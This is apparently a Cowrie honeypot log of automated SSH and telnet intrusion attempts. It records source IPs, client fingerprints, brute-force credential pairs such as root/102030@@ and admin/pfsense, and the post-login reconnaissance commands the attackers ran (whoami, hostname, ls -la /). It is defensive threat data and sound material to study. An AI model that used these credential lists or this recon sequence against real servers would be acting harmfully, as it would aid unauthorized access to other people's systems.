{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:25:12.386727Z","src_ip":"212.227.125.160","session":"74fe8eb9b246"}
{"eventid":"cowrie.login.success","username":"root","password":"G0t!@#ntk2016","message":"login attempt [root/G0t!@#ntk2016] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:25:18.431195Z","src_ip":"212.227.125.160","session":"74fe8eb9b246"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:25:22.394484Z","src_ip":"212.227.125.160","session":"74fe8eb9b246"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-28T21:25:22.395269Z","src_ip":"212.227.125.160","session":"74fe8eb9b246"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"2.3","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:25:24.655231Z","src_ip":"212.227.125.160","session":"74fe8eb9b246"}
{"eventid":"cowrie.session.closed","duration":"13.9","message":"Connection lost after 13.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:25:24.656274Z","src_ip":"212.227.125.160","session":"74fe8eb9b246"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":36702,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b89c3f7e9a0","protocol":"ssh","message":"New connection: 201.148.180.50:36702 (1.2.3.4:22) [session: 6b89c3f7e9a0]","sensor":"my-vps","timestamp":"2025-08-28T21:25:26.640515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:25:27.723037Z","src_ip":"201.148.180.50","session":"6b89c3f7e9a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:25:27.723845Z","src_ip":"201.148.180.50","session":"6b89c3f7e9a0"}
{"eventid":"cowrie.login.success","username":"root","password":"G0t!@#ntk2016","message":"login attempt [root/G0t!@#ntk2016] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:25:35.444362Z","src_ip":"201.148.180.50","session":"6b89c3f7e9a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:25:38.280769Z","src_ip":"201.148.180.50","session":"6b89c3f7e9a0"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T21:25:38.281491Z","src_ip":"201.148.180.50","session":"6b89c3f7e9a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:25:39.773571Z","src_ip":"201.148.180.50","session":"6b89c3f7e9a0"}
{"eventid":"cowrie.session.closed","duration":"13.1","message":"Connection lost after 13.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:25:39.774682Z","src_ip":"201.148.180.50","session":"6b89c3f7e9a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36868,"dst_ip":"1.2.3.4","dst_port":23,"session":"28312771ffba","protocol":"telnet","message":"New connection: 212.227.125.160:36868 (1.2.3.4:23) [session: 28312771ffba]","sensor":"my-vps","timestamp":"2025-08-28T21:26:41.514041Z"}
{"eventid":"cowrie.session.closed","duration":30.84022068977356,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:27:12.354197Z","src_ip":"212.227.125.160","session":"28312771ffba"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":52633,"dst_ip":"1.2.3.4","dst_port":22,"session":"75fc60b99172","protocol":"ssh","message":"New connection: 79.127.48.196:52633 (1.2.3.4:22) [session: 75fc60b99172]","sensor":"my-vps","timestamp":"2025-08-28T21:27:53.175888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:28:06.469059Z","src_ip":"79.127.48.196","session":"75fc60b99172"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:28:06.469871Z","src_ip":"79.127.48.196","session":"75fc60b99172"}
{"eventid":"cowrie.login.success","username":"root","password":"12341234","message":"login attempt [root/12341234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:28:52.534513Z","src_ip":"79.127.48.196","session":"75fc60b99172"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:29:21.516752Z","src_ip":"79.127.48.196","session":"75fc60b99172"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-28T21:29:21.517425Z","src_ip":"79.127.48.196","session":"75fc60b99172"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54636,"dst_ip":"1.2.3.4","dst_port":22,"session":"30cd2c7b3e53","protocol":"ssh","message":"New connection: 217.72.205.35:54636 (1.2.3.4:22) [session: 30cd2c7b3e53]","sensor":"my-vps","timestamp":"2025-08-28T21:29:23.822308Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:29:23.823465Z","src_ip":"217.72.205.35","session":"30cd2c7b3e53"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"23.8","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 23.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:29:45.275870Z","src_ip":"79.127.48.196","session":"75fc60b99172"}
{"eventid":"cowrie.session.closed","duration":"121.6","message":"Connection lost after 121.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:29:54.729832Z","src_ip":"79.127.48.196","session":"75fc60b99172"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34156,"dst_ip":"1.2.3.4","dst_port":22,"session":"3954d1d8c1a8","protocol":"ssh","message":"New connection: 212.227.125.160:34156 (1.2.3.4:22) [session: 3954d1d8c1a8]","sensor":"my-vps","timestamp":"2025-08-28T21:30:04.432350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:30:04.475816Z","src_ip":"212.227.125.160","session":"3954d1d8c1a8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T21:30:04.520208Z","src_ip":"212.227.125.160","session":"3954d1d8c1a8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pfsense","message":"login attempt [admin/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T21:30:04.691970Z","src_ip":"212.227.125.160","session":"3954d1d8c1a8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:30:05.781368Z","src_ip":"212.227.125.160","session":"3954d1d8c1a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34090,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fd988d9156c","protocol":"ssh","message":"New connection: 212.227.235.229:34090 (1.2.3.4:22) [session: 9fd988d9156c]","sensor":"my-vps","timestamp":"2025-08-28T21:31:00.942520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:31:00.943540Z","src_ip":"212.227.235.229","session":"9fd988d9156c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T21:31:01.047995Z","src_ip":"212.227.235.229","session":"9fd988d9156c"}
{"eventid":"cowrie.login.failed","username":"gns3","password":"gns3","message":"login attempt [gns3/gns3] failed","sensor":"my-vps","timestamp":"2025-08-28T21:31:01.363630Z","src_ip":"212.227.235.229","session":"9fd988d9156c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:31:02.470520Z","src_ip":"212.227.235.229","session":"9fd988d9156c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39004,"dst_ip":"1.2.3.4","dst_port":22,"session":"e592d9d14d0c","protocol":"ssh","message":"New connection: 212.227.125.160:39004 (1.2.3.4:22) [session: e592d9d14d0c]","sensor":"my-vps","timestamp":"2025-08-28T21:31:38.722427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:31:40.318786Z","src_ip":"212.227.125.160","session":"e592d9d14d0c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:31:40.320271Z","src_ip":"212.227.125.160","session":"e592d9d14d0c"}
{"eventid":"cowrie.login.success","username":"root","password":"102030@@","message":"login attempt [root/102030@@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:31:45.153147Z","src_ip":"212.227.125.160","session":"e592d9d14d0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:31:48.377589Z","src_ip":"212.227.125.160","session":"e592d9d14d0c"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T21:31:48.378350Z","src_ip":"212.227.125.160","session":"e592d9d14d0c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:31:49.798186Z","src_ip":"212.227.125.160","session":"e592d9d14d0c"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:31:49.799259Z","src_ip":"212.227.125.160","session":"e592d9d14d0c"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":60500,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ae2a9ce7492","protocol":"ssh","message":"New connection: 201.148.180.50:60500 (1.2.3.4:22) [session: 7ae2a9ce7492]","sensor":"my-vps","timestamp":"2025-08-28T21:31:59.183447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:32:00.827750Z","src_ip":"201.148.180.50","session":"7ae2a9ce7492"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:32:00.828570Z","src_ip":"201.148.180.50","session":"7ae2a9ce7492"}
{"eventid":"cowrie.login.success","username":"root","password":"102030@@","message":"login attempt [root/102030@@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:32:06.638940Z","src_ip":"201.148.180.50","session":"7ae2a9ce7492"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:32:10.204469Z","src_ip":"201.148.180.50","session":"7ae2a9ce7492"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-28T21:32:10.205351Z","src_ip":"201.148.180.50","session":"7ae2a9ce7492"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:32:11.739319Z","src_ip":"201.148.180.50","session":"7ae2a9ce7492"}
{"eventid":"cowrie.session.closed","duration":"12.6","message":"Connection lost after 12.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:32:11.740354Z","src_ip":"201.148.180.50","session":"7ae2a9ce7492"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57104,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c77b9a3886b","protocol":"telnet","message":"New connection: 212.227.125.160:57104 (1.2.3.4:23) [session: 7c77b9a3886b]","sensor":"my-vps","timestamp":"2025-08-28T21:35:23.836972Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56682,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8f2bad1aa8a","protocol":"ssh","message":"New connection: 217.72.205.35:56682 (1.2.3.4:22) [session: f8f2bad1aa8a]","sensor":"my-vps","timestamp":"2025-08-28T21:35:55.306343Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:35:55.307415Z","src_ip":"217.72.205.35","session":"f8f2bad1aa8a"}
{"eventid":"cowrie.login.success","username":"root","password":"ZYByunb189","message":"login attempt [root/ZYByunb189] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:36:24.544367Z","src_ip":"212.227.125.160","session":"7c77b9a3886b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:36:24.562444Z","src_ip":"212.227.125.160","session":"7c77b9a3886b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":14239,"dst_ip":"1.2.3.4","dst_port":23,"session":"bd6efacc3930","protocol":"telnet","message":"New connection: 212.227.125.160:14239 (1.2.3.4:23) [session: bd6efacc3930]","sensor":"my-vps","timestamp":"2025-08-28T21:37:48.197303Z"}
{"eventid":"cowrie.session.closed","duration":12.290080308914185,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:38:00.487298Z","src_ip":"212.227.125.160","session":"bd6efacc3930"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.210.18","src_port":60884,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a88706778e2","protocol":"telnet","message":"New connection: 170.64.210.18:60884 (1.2.3.4:23) [session: 2a88706778e2]","sensor":"my-vps","timestamp":"2025-08-28T21:38:11.582837Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T21:38:12.226187Z","src_ip":"170.64.210.18","session":"2a88706778e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46624,"dst_ip":"1.2.3.4","dst_port":22,"session":"7065a89f77b9","protocol":"ssh","message":"New connection: 212.227.125.160:46624 (1.2.3.4:22) [session: 7065a89f77b9]","sensor":"my-vps","timestamp":"2025-08-28T21:38:13.252448Z"}
{"eventid":"cowrie.session.closed","duration":2.764329671859741,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:38:14.347096Z","src_ip":"170.64.210.18","session":"2a88706778e2"}
